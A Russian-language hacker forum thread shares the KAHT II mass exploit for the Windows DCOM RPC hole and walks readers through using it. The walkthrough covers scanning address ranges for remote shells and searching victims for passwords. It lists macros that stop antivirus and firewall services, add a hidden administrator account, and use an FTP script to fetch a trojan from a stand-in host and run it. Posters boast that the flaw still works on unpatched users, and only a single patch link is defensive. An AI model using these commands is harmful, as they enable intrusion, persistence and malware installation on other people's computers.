KAHT II - Massive RPC Exploit

[Sef]

Появился у меня сплойт, юзающий дыру в DCOM RPC..
С помощью него мой компутер уже ломанули
После взлома вы можете расшаривать на машине жертвы любые ресурсы
и в общем получаете полный доступ к тачке :cool:
Благо 'хакеры' просто переименовали один из разделов харда.. Ниче не стерли, хотя могли бы ;)
Короче вот он, разбирайтесь, смотрите и т.д. и т.п.
З.Ы. действует на "голую" WinXP.. после установки сервиспака все гут
З.З.Ы. извиняюсь что файл сжат.. все из-за лимита в 19,5 кб

[nons]

хых...это кахт..весьма неплохо что ты выложил исходник, а то многие ограничиваются exe'шником гутъ
попозже поищу инфу по сабжу, для образовательныз целей ;)

[nons]

Некоторое время назад на многих сайтах посвященных security появилась информация о уязвимости найденной в RPC. Уязвимости оказались подвержены winXP, NT, 2000. Сначала для этой баги был выложен сплоит который просто перезагружал машину, позднее стали появляться эксплоиты которые давали командную строку на уязвимой машине. Ну и конечно не обошлось без червя который юзает эту багу для распространения На червяке мы останавливаться не будем т.к. это для нас не особо интересно (во всяком случае для меня) а немного разберемся с одним из представителей веселой братии прог-сплоитов дающем командную строку. Итак на сцене KAHTII Чем же он так примечателен? Во-первых как следует из названия "KAHT II - MASSIVE RPC EXPLOIT" этот сплоит может сканировать диапазон адресов на наличие уязвимости (удобно правда?) Во-вторых он может юзаться под виндой (script kiddies ликуют) В-третьих в нем реализована офигительная фишка называемая "macros" ака макросы... ну на этом мы остановимся чуть позднее. Итак что нам надо для начала? ПИВА!!! - крики из зала.... Мммм пиво конечно нужно, но для начала надо бы скачать сам сплоит. Значит бегом на securitylab.ru (например) ищем либо по названию, либо файл kaht2.zip качаем... разархивируем. Имеем в каталоге в который развернули архив следующие файлы: kaHt2.exe - собсна прога с которой нам придется иметь дело kaHt2.c - енто будет вам нужно лишь в случае если вы *nix-like юзер macros.txt - файлик с макросами Ну что начнем? Запускаем командную строку. Набираем там следующую хрень: kaHt2.exe 111.111.111.1 111.111.111.111 где 111.111.111.1 и 111.111.111.111 соответственно диапазон адресов для сканирования. И запускаем.... let's start a war как говорится.... Вдоволь насканившись при удачном результате если среди просканеных компов есть уязвимые вы получите командную строку на удаленной тачке. Забегая вперед скажу что после того как закончите мучить первую жертву жмите ctrl+z и сплоит перекинет вас на следующую багнутую машину, все для удобства пользователя блин. Ну чтож мы внутри... осмотримся... команды надеюсь вы знаете. Можно искать номера асек, пароли... ну сами не маленькие. Теперь будем делать свое пребывание на тачке более комфортным. Тут то нам и пригодятся макросы о которых я говорил выше. Открывайте файл macros.txt щас мы с вами будем творить... Уххх как много интересного
Например это:

[Macro]
name=kill_avs
key=!1
delay=500
cmd=net stop Mcshield
cmd=net stop "Norton Antivirus Service"
cmd=net stop "Panda Antivirus"
cmd=net stop "ZoneAlarm"
cmd=net stop "Detector de OfficeScanNT"
cmd=net stop "McAfee Framework Service"

Знаете что это? Нет??? Ну ладно щас расскажу. Когда вы юзаете командную строку на удаленной тачке через сплоит наберите !1 и сплоит закроет фаеры и антивири. Соответственно вы сами можете дополнить список команд. Синтаксис прост: cmd=команда_для_выполнения

Или вот ещё:

[Macro]
name=Adduser
key=!5
delay=500
cmd=net user SUPPORT_3569a74r KaHTSecuritycheck/add
cmd=net localgroup Administradores SUPPORT_3569a74r /add
cmd=net localgroup Administrators SUPPORT_3569a74r /add
cmd=net group "Domain Admins" SUPPORT_3569a74r /add

Набрав !5 вы добавите пользователя на тачке.

Все это безусловно интересно но давай-те передем к практике. Будем заливать файло на комп жертвы. Для этого будем писать свой макрос. Поехали. Пишем в файл.

[Macro]
name=upload
key=!2
delay=500
cmd=echo open hack.ru 21>a
cmd=echo hacker>>a
cmd=echo password>>a
cmd=echo get read.txt>>a
cmd=echo bye>>a
cmd=start ftp -s:a

Итак рассмотрим более подробно. cmd=echo open hack.ru 21>a - пишем в файл a 'echo open hacksite.ru 21' т.е. коннектимся к сайту hack.ru
cmd=echo hacker>>a - логин hacker
cmd=echo password>>a - пароль password
cmd=echo get read.txt>>a - получить файл read.txt
cmd=echo bye>>a - до свиданья...
cmd=start ftp -s:a - открываем фтп и передаем ему в кач-ве команд текст из файла a

Теперь испробуем. В командной строке набираем !2 и после выполнения макроса получаем в каталоге файл read.txt скачанный с нашего сайта...

Ну как? Идеи появились? Что нет? Ну вы блин даете Лана... лана... файл read.txt это конечно нереально круто но может все таки закинем ламаку троян? Аааа... вижу как глазки загорелись. Следующий макрос:


[Macro]
name=Upload_Supa_Trojan
key=!3
delay=500
cmd=echo open hacksite.ru 21>a
cmd=echo hacker>>a
cmd=echo password>>a
cmd=echo get troj.exe>>a
cmd=echo bye>>a
cmd=start ftp -s:a
delay=15000

Тут все тоже самое только получаем файл troj.exe Надеюсь вы догадаетеcь заранее залить его на ваш сервак Жмем !3 После выполнения этого макроса в каталоге появится файлик троя. Теперь нам осталось его только запустить.
Набиваем: start troj.exe

Всё. Ещё одной протрояненой тачкой в инете стало больше. Кстати. SubSeven - best troy in net ))) IMHO.
Вот такие калачи. Если вы не хотите пополнить ряды людей которых поимели с помощью данного сплоита качайте заплатку.
Вот тут патч для русской ХРени :
download.microsoft.com/download/7/0/f/70f4eb2a-a663-4292-8ce7-581b1715bb51/WindowsXP-KB823980-x86-RUS.exe Для других систем без труда найдете сами

http://www.cyberinfo.ru/

[GaMBiT]

Вообще то время дыры использующую RPC DCOM уже давно ушло (начало 2003 года)! С помощью этой дыры можно ломануть разве что совсем уж ломаков!

ЗЫ: Не в обиду Sef

[Sef]

Вообще то время дыры использующую RPC DCOM уже давно ушло (начало 2003 года)! С помощью этой дыры можно ломануть разве что совсем уж ломаков!

ЗЫ: Не в обиду Sef

Либо тех кто не установил сп2 или у кого нету дистра хрюши с уже установленным сп2..
З.Ы. не установил потому как диска не было.. появился када уже ломанули

[Mozart]

Дык ламаки - не только те, кто не шарит в компах....

[[Fk]]

у кого есть либо библиотеки..либо уже скомпилированный файл?

[$pieler]

у кого есть либо библиотеки..либо уже скомпилированный файл?

У меня нету... :( Я пытался откомпилить, тока ничо не получилось...
с INTEL C++ COMPILER v5.0115.

[Vanda]

Вообще то время дыры использующую RPC DCOM уже давно ушло (начало 2003 года)! С помощью этой дыры можно ломануть разве что совсем уж ломаков!

ЗЫ: Не в обиду Sef

Тогда в сети ОгРоМнОе число ламаков! Эта дыра актуальна и по сей день - проверено:D Их было и в прошлом году много и в этом